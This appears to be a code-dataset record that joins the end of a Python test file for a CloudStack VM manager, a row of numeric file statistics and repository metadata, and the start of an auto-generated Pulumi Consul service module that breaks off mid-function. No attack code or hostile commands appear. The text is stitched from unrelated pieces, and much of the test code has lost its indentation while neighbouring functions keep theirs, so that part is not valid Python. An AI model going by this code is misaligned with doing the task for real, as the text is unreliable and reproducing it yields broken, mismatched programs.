self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_public_network_name(self, uuid):
def cleanup():
del os.environ["CLOUDSTACK_PUBLIC_NETWORK_NAME"]
self.addCleanup(cleanup)
os.environ["CLOUDSTACK_PUBLIC_NETWORK_NAME"] = "NOPOWER"
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1", "networkname": "POWERNET"},
{"ipaddress": "192.168.1.1", "networkname": "NOPOWER"},
{"ipaddress": "172.16.42.1", "networkname": "KPOWER"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("192.168.1.1", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_multi_nic_no_network_name(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1", "networkname": "POWERNET"},
{"ipaddress": "192.168.1.1", "networkname": "NOPOWER"},
{"ipaddress": "172.16.42.1", "networkname": "KPOWER"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("172.16.42.1", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
def test_start_instance_timeout(self):
    """start_instance raises MaxTryExceededError once CLOUDSTACK_MAX_TRIES is exhausted."""
    os.environ["CLOUDSTACK_MAX_TRIES"] = "1"
    # pop without a default raises KeyError when absent, matching `del`.
    self.addCleanup(os.environ.pop, "CLOUDSTACK_MAX_TRIES")
    self.set_api_envs()
    self.addCleanup(self.del_api_envs)
    self.set_vm_envs()
    self.addCleanup(self.del_vm_envs)
    instance = storage.Instance(name="some_instance", units=[])
    fake_storage = mock.Mock()
    fake_storage.retrieve_instance.return_value = instance
    api = mock.Mock()
    api.deployVirtualMachine.return_value = {"id": "abc123",
                                             "jobid": "qwe321"}
    # The async job never reports success, so the manager must give up.
    api.queryAsyncJobResult.return_value = {"jobstatus": 0}
    manager = cloudstack.CloudStackManager(storage=fake_storage)
    manager.client = api
    with self.assertRaises(cloudstack.MaxTryExceededError) as cm:
        manager.start_instance("some_instance")
    self.assertEqual(1, cm.exception.max_tries)
def test_terminate_instance(self):
    """terminate_instance destroys the VM behind each of the instance's units."""
    self.set_api_envs()
    self.addCleanup(self.del_api_envs)
    vm_ids = ["vm-123", "vm-456"]
    instance = storage.Instance(
        name="some_instance",
        units=[storage.Unit(id=vm_id) for vm_id in vm_ids])
    fake_storage = mock.Mock()
    fake_storage.retrieve_instance.return_value = instance
    manager = cloudstack.CloudStackManager(storage=fake_storage)
    api = manager.client = mock.Mock()
    got_instance = manager.terminate_instance("some_instance")
    self.assertEqual(instance, got_instance)
    self.assertEqual([mock.call({"id": vm_id}) for vm_id in vm_ids],
                     api.destroyVirtualMachine.call_args_list)
@mock.patch("sys.stderr")
def test_terminate_instance_ignores_exceptions(self, stderr):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
instance = storage.Instance(name="some_instance",
units=[storage.Unit(id="vm-123"),
storage.Unit(id="vm-456")])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.destroyVirtualMachine.side_effect = Exception("wat", "wot")
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.terminate_instance("some_instance")
self.assertEqual(instance, got_instance)
stderr.write.assert_called_with("[ERROR] Failed to terminate CloudStack VM: wat wot")
@mock.patch("uuid.uuid4")
def test_physical_scale_up(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance",
units=[storage.Unit(id="123")])
strg_mock = mock.Mock()
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "qwe123", "nic": [{"ipaddress": "10.0.0.5"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
units = manager.physical_scale(instance, 2)
self.assertEqual(2, len(instance.units))
self.assertEqual(1, len(units))
unit = instance.units[1]
self.assertEqual("qwe123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("10.0.0.5", unit.dns_name)
self.assertEqual("creating", unit.state)
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
def test_physical_scale_down(self):
    """Scaling from 3 to 1 unit destroys the first two units' VMs and keeps the last."""
    self.set_api_envs()
    self.addCleanup(self.del_api_envs)
    original_units = [storage.Unit(id="vm-123"), storage.Unit(id="vm-456"),
                      storage.Unit(id="vm-789")]
    instance = storage.Instance(name="some_instance",
                                units=copy.deepcopy(original_units))
    manager = cloudstack.CloudStackManager(storage=mock.Mock())
    api = manager.client = mock.Mock()
    removed_units = manager.physical_scale(instance, 1)
    self.assertEqual(1, len(instance.units))
    self.assertEqual(2, len(removed_units))
    self.assertEqual("vm-789", instance.units[0].id)
    self.assertEqual([mock.call({"id": "vm-123"}), mock.call({"id": "vm-456"})],
                     api.destroyVirtualMachine.call_args_list)
class MaxTryExceededErrorTestCase(unittest.TestCase):
    """Tests for the MaxTryExceededError exception type."""

    def test_error_message(self):
        error = cloudstack.MaxTryExceededError(40)
        self.assertEqual(40, error.max_tries)
        self.assertEqual(("exceeded 40 tries",), error.args)
| 50.873096
| 93
| 0.641289
| 2,278
| 20,044
| 5.367867
| 0.080773
| 0.04825
| 0.017991
| 0.034347
| 0.849444
| 0.81526
| 0.783039
| 0.779441
| 0.760877
| 0.756706
| 0
| 0.018821
| 0.244512
| 20,044
| 393
| 94
| 51.002545
| 0.788681
| 0.007633
| 0
| 0.738292
| 0
| 0
| 0.130688
| 0.015739
| 0
| 0
| 0
| 0
| 0.220386
| 1
| 0.060606
| false
| 0
| 0.016529
| 0
| 0.082645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
698ec548e5329be27b0c0a6845653091ba28e24a
| 32,783
|
py
|
Python
|
sdk/python/pulumi_consul/service.py
|
pulumi/pulumi-consul
|
5b66c5b97fda6b5433bfb4d4173c999e468c82e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2019-11-12T12:21:18.000Z
|
2021-07-31T08:17:22.000Z
|
sdk/python/pulumi_consul/service.py
|
pulumi/pulumi-consul
|
5b66c5b97fda6b5433bfb4d4173c999e468c82e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 38
|
2019-11-21T15:19:33.000Z
|
2022-03-31T15:24:11.000Z
|
sdk/python/pulumi_consul/service.py
|
pulumi/pulumi-consul
|
5b66c5b97fda6b5433bfb4d4173c999e468c82e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-11-24T12:23:13.000Z
|
2021-12-06T17:33:31.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServiceArgs', 'Service']
@pulumi.input_type
class ServiceArgs:
    # NOTE(review): tfgen-generated input type; only comments/docstrings were
    # touched here -- regenerate rather than hand-editing the logic.
    def __init__(__self__, *,
                 node: pulumi.Input[str],
                 address: Optional[pulumi.Input[str]] = None,
                 checks: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]] = None,
                 datacenter: Optional[pulumi.Input[str]] = None,
                 enable_tag_override: Optional[pulumi.Input[bool]] = None,
                 external: Optional[pulumi.Input[bool]] = None,
                 meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 service_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a Service resource.
        :param pulumi.Input[str] node: The name of the node to register the service on.
        :param pulumi.Input[str] address: The address of the service. Defaults to the
               address of the node.
        :param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
               agent's default datacenter and the datacenter in the provider setup.
        :param pulumi.Input[bool] enable_tag_override: Specifies to disable the
               anti-entropy feature for this service's tags. Defaults to `false`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
               instance.
        :param pulumi.Input[str] name: The name of the health-check.
        :param pulumi.Input[str] namespace: The namespace to create the service within.
        :param pulumi.Input[int] port: The port of the service.
        :param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
               of the `name` attribute.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
               but can be used to distinguish between services or nodes.
        """
        # `node` is the only required property; every other one is set only
        # when explicitly provided.
        pulumi.set(__self__, "node", node)
        if address is not None:
            pulumi.set(__self__, "address", address)
        if checks is not None:
            pulumi.set(__self__, "checks", checks)
        if datacenter is not None:
            pulumi.set(__self__, "datacenter", datacenter)
        if enable_tag_override is not None:
            pulumi.set(__self__, "enable_tag_override", enable_tag_override)
        if external is not None:
            # Deprecated input: warn at construction time but still store the
            # value below for backwards compatibility.
            warnings.warn("""The external field has been deprecated and does nothing.""", DeprecationWarning)
            pulumi.log.warn("""external is deprecated: The external field has been deprecated and does nothing.""")
        if external is not None:
            pulumi.set(__self__, "external", external)
        if meta is not None:
            pulumi.set(__self__, "meta", meta)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if service_id is not None:
            pulumi.set(__self__, "service_id", service_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def node(self) -> pulumi.Input[str]:
        """
        The name of the node to register the service on.
        """
        return pulumi.get(self, "node")

    @node.setter
    def node(self, value: pulumi.Input[str]):
        pulumi.set(self, "node", value)

    @property
    @pulumi.getter
    def address(self) -> Optional[pulumi.Input[str]]:
        """
        The address of the service. Defaults to the
        address of the node.
        """
        return pulumi.get(self, "address")

    @address.setter
    def address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "address", value)

    @property
    @pulumi.getter
    def checks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]:
        """
        Health-checks (`ServiceCheckArgs`) to register with the service.
        """
        return pulumi.get(self, "checks")

    @checks.setter
    def checks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]):
        pulumi.set(self, "checks", value)

    @property
    @pulumi.getter
    def datacenter(self) -> Optional[pulumi.Input[str]]:
        """
        The datacenter to use. This overrides the
        agent's default datacenter and the datacenter in the provider setup.
        """
        return pulumi.get(self, "datacenter")

    @datacenter.setter
    def datacenter(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "datacenter", value)

    @property
    @pulumi.getter(name="enableTagOverride")
    def enable_tag_override(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies to disable the
        anti-entropy feature for this service's tags. Defaults to `false`.
        """
        return pulumi.get(self, "enable_tag_override")

    @enable_tag_override.setter
    def enable_tag_override(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_tag_override", value)

    @property
    @pulumi.getter
    def external(self) -> Optional[pulumi.Input[bool]]:
        """
        Deprecated: the external field has been deprecated and does nothing.
        """
        return pulumi.get(self, "external")

    @external.setter
    def external(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "external", value)

    @property
    @pulumi.getter
    def meta(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of arbitrary KV metadata linked to the service
        instance.
        """
        return pulumi.get(self, "meta")

    @meta.setter
    def meta(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "meta", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the health-check.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """
        The namespace to create the service within.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        The port of the service.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="serviceId")
    def service_id(self) -> Optional[pulumi.Input[str]]:
        """
        - If the service ID is not provided, it will be defaulted to the value
        of the `name` attribute.
        """
        return pulumi.get(self, "service_id")

    @service_id.setter
    def service_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of values that are opaque to Consul,
        but can be used to distinguish between services or nodes.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServiceState:
    # NOTE(review): tfgen-generated state type (all properties optional, used
    # for lookup/import); only comments/docstrings were touched here.
    def __init__(__self__, *,
                 address: Optional[pulumi.Input[str]] = None,
                 checks: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]] = None,
                 datacenter: Optional[pulumi.Input[str]] = None,
                 enable_tag_override: Optional[pulumi.Input[bool]] = None,
                 external: Optional[pulumi.Input[bool]] = None,
                 meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 node: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 service_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering Service resources.
        :param pulumi.Input[str] address: The address of the service. Defaults to the
               address of the node.
        :param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
               agent's default datacenter and the datacenter in the provider setup.
        :param pulumi.Input[bool] enable_tag_override: Specifies to disable the
               anti-entropy feature for this service's tags. Defaults to `false`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
               instance.
        :param pulumi.Input[str] name: The name of the health-check.
        :param pulumi.Input[str] namespace: The namespace to create the service within.
        :param pulumi.Input[str] node: The name of the node to register the service on.
        :param pulumi.Input[int] port: The port of the service.
        :param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
               of the `name` attribute.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
               but can be used to distinguish between services or nodes.
        """
        if address is not None:
            pulumi.set(__self__, "address", address)
        if checks is not None:
            pulumi.set(__self__, "checks", checks)
        if datacenter is not None:
            pulumi.set(__self__, "datacenter", datacenter)
        if enable_tag_override is not None:
            pulumi.set(__self__, "enable_tag_override", enable_tag_override)
        if external is not None:
            # Deprecated input: warn at construction time but still store the
            # value below for backwards compatibility.
            warnings.warn("""The external field has been deprecated and does nothing.""", DeprecationWarning)
            pulumi.log.warn("""external is deprecated: The external field has been deprecated and does nothing.""")
        if external is not None:
            pulumi.set(__self__, "external", external)
        if meta is not None:
            pulumi.set(__self__, "meta", meta)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if node is not None:
            pulumi.set(__self__, "node", node)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if service_id is not None:
            pulumi.set(__self__, "service_id", service_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def address(self) -> Optional[pulumi.Input[str]]:
        """
        The address of the service. Defaults to the
        address of the node.
        """
        return pulumi.get(self, "address")

    @address.setter
    def address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "address", value)

    @property
    @pulumi.getter
    def checks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]:
        """
        Health-checks (`ServiceCheckArgs`) registered with the service.
        """
        return pulumi.get(self, "checks")

    @checks.setter
    def checks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]):
        pulumi.set(self, "checks", value)

    @property
    @pulumi.getter
    def datacenter(self) -> Optional[pulumi.Input[str]]:
        """
        The datacenter to use. This overrides the
        agent's default datacenter and the datacenter in the provider setup.
        """
        return pulumi.get(self, "datacenter")

    @datacenter.setter
    def datacenter(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "datacenter", value)

    @property
    @pulumi.getter(name="enableTagOverride")
    def enable_tag_override(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies to disable the
        anti-entropy feature for this service's tags. Defaults to `false`.
        """
        return pulumi.get(self, "enable_tag_override")

    @enable_tag_override.setter
    def enable_tag_override(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_tag_override", value)

    @property
    @pulumi.getter
    def external(self) -> Optional[pulumi.Input[bool]]:
        """
        Deprecated: the external field has been deprecated and does nothing.
        """
        return pulumi.get(self, "external")

    @external.setter
    def external(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "external", value)

    @property
    @pulumi.getter
    def meta(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of arbitrary KV metadata linked to the service
        instance.
        """
        return pulumi.get(self, "meta")

    @meta.setter
    def meta(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "meta", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the health-check.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """
        The namespace to create the service within.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter
    def node(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the node to register the service on.
        """
        return pulumi.get(self, "node")

    @node.setter
    def node(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "node", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        The port of the service.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="serviceId")
    def service_id(self) -> Optional[pulumi.Input[str]]:
        """
        - If the service ID is not provided, it will be defaulted to the value
        of the `name` attribute.
        """
        return pulumi.get(self, "service_id")

    @service_id.setter
    def service_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of values that are opaque to Consul,
        but can be used to distinguish between services or nodes.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
class Service(pulumi.CustomResource):
# Overload: construct a Service from individual property keyword arguments.
# The real work happens in _internal_init; this stub exists for type checkers.
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             address: Optional[pulumi.Input[str]] = None,
             checks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCheckArgs']]]]] = None,
             datacenter: Optional[pulumi.Input[str]] = None,
             enable_tag_override: Optional[pulumi.Input[bool]] = None,
             external: Optional[pulumi.Input[bool]] = None,
             meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
             name: Optional[pulumi.Input[str]] = None,
             namespace: Optional[pulumi.Input[str]] = None,
             node: Optional[pulumi.Input[str]] = None,
             port: Optional[pulumi.Input[int]] = None,
             service_id: Optional[pulumi.Input[str]] = None,
             tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             __props__=None):
    """
    A high-level resource for creating a Service in Consul in the Consul catalog. This
    is appropriate for registering [external services](https://www.consul.io/docs/guides/external.html) and
    can be used to create services addressable by Consul that cannot be registered
    with a [local agent](https://www.consul.io/docs/agent/basics.html).

    > **NOTE:** If a Consul agent is running on the node where this service is
    registered, it is not recommended to use this resource as the service will be
    removed during the next [anti-entropy synchronization](https://www.consul.io/docs/architecture/anti-entropy).

    ## Example Usage

    Creating a new node with the service:

    ```python
    import pulumi
    import pulumi_consul as consul

    compute = consul.Node("compute", address="www.google.com")
    google = consul.Service("google",
        node=compute.name,
        port=80,
        tags=["tag0"])
    ```

    Utilizing an existing known node:

    ```python
    import pulumi
    import pulumi_consul as consul

    google = consul.Service("google",
        node="google",
        port=443)
    ```

    Register a health-check:

    ```python
    import pulumi
    import pulumi_consul as consul

    redis = consul.Service("redis",
        checks=[consul.ServiceCheckArgs(
            check_id="service:redis1",
            deregister_critical_service_after="30s",
            headers=[
                consul.ServiceCheckHeaderArgs(
                    name="foo",
                    value=["test"],
                ),
                consul.ServiceCheckHeaderArgs(
                    name="bar",
                    value=["test"],
                ),
            ],
            http="https://www.hashicorptest.com",
            interval="5s",
            method="PUT",
            name="Redis health check",
            status="passing",
            timeout="1s",
            tls_skip_verify=False,
        )],
        node="redis",
        port=6379)
    ```

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] address: The address of the service. Defaults to the
           address of the node.
    :param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
           agent's default datacenter and the datacenter in the provider setup.
    :param pulumi.Input[bool] enable_tag_override: Specifies to disable the
           anti-entropy feature for this service's tags. Defaults to `false`.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
           instance.
    :param pulumi.Input[str] name: The name of the health-check.
    :param pulumi.Input[str] namespace: The namespace to create the service within.
    :param pulumi.Input[str] node: The name of the node to register the service on.
    :param pulumi.Input[int] port: The port of the service.
    :param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
           of the `name` attribute.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
           but can be used to distinguish between services or nodes.
    """
    ...
# Overload: construct a Service from a bundled ServiceArgs object.
# The real work happens in _internal_init; this stub exists for type checkers.
@overload
def __init__(__self__,
             resource_name: str,
             args: ServiceArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    A high-level resource for creating a Service in Consul in the Consul catalog. This
    is appropriate for registering [external services](https://www.consul.io/docs/guides/external.html) and
    can be used to create services addressable by Consul that cannot be registered
    with a [local agent](https://www.consul.io/docs/agent/basics.html).

    > **NOTE:** If a Consul agent is running on the node where this service is
    registered, it is not recommended to use this resource as the service will be
    removed during the next [anti-entropy synchronization](https://www.consul.io/docs/architecture/anti-entropy).

    ## Example Usage

    Creating a new node with the service:

    ```python
    import pulumi
    import pulumi_consul as consul

    compute = consul.Node("compute", address="www.google.com")
    google = consul.Service("google",
        node=compute.name,
        port=80,
        tags=["tag0"])
    ```

    Utilizing an existing known node:

    ```python
    import pulumi
    import pulumi_consul as consul

    google = consul.Service("google",
        node="google",
        port=443)
    ```

    Register a health-check:

    ```python
    import pulumi
    import pulumi_consul as consul

    redis = consul.Service("redis",
        checks=[consul.ServiceCheckArgs(
            check_id="service:redis1",
            deregister_critical_service_after="30s",
            headers=[
                consul.ServiceCheckHeaderArgs(
                    name="foo",
                    value=["test"],
                ),
                consul.ServiceCheckHeaderArgs(
                    name="bar",
                    value=["test"],
                ),
            ],
            http="https://www.hashicorptest.com",
            interval="5s",
            method="PUT",
            name="Redis health check",
            status="passing",
            timeout="1s",
            tls_skip_verify=False,
        )],
        node="redis",
        port=6379)
    ```

    :param str resource_name: The name of the resource.
    :param ServiceArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    # Runtime dispatcher for the two @overload signatures above: detect
    # whether the caller supplied a bundled ServiceArgs or per-property
    # keyword arguments, then forward to _internal_init either way.
    resource_args, opts = _utilities.get_resource_args_opts(ServiceArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is not None:
        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
    else:
        __self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   address: Optional[pulumi.Input[str]] = None,
                   checks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCheckArgs']]]]] = None,
                   datacenter: Optional[pulumi.Input[str]] = None,
                   enable_tag_override: Optional[pulumi.Input[bool]] = None,
                   external: Optional[pulumi.Input[bool]] = None,
                   meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   namespace: Optional[pulumi.Input[str]] = None,
                   node: Optional[pulumi.Input[str]] = None,
                   port: Optional[pulumi.Input[int]] = None,
                   service_id: Optional[pulumi.Input[str]] = None,
                   tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   __props__=None):
    # Shared implementation behind both __init__ overloads: validate options,
    # build the ServiceArgs property bag, and register with the engine.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    if opts.id is None:
